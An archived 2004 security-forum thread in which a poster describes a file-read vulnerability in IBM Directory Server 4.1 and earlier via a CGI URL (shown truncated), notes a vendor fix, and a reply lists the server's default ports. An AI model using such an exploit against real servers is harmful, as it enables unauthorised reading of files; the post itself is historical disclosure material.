hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > Exploit Articles
qcred11
Aug 3 2004, 07:55 AM
QUOTE


hi there,

try this to read any file on IBM Directory Server <= 4.1


http://myserver/ldap/cgi-bin/ldacgi.exe?Ac...lePath=enus1252


PS:
This vuln is already known to IBM and a fix is available.
But since i did not found any information about existence and
exploitation of this vuln on the web, i wrote this little mail.




Source: http://www.securitytracker.com/alerts/2004/Aug/1010834.html
TheOther
Aug 3 2004, 08:26 AM
On what port is this IBM Directory Server running?

EDIT: LDAP-->389
IDS-->3538 non-SSL
3539 with SSL
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.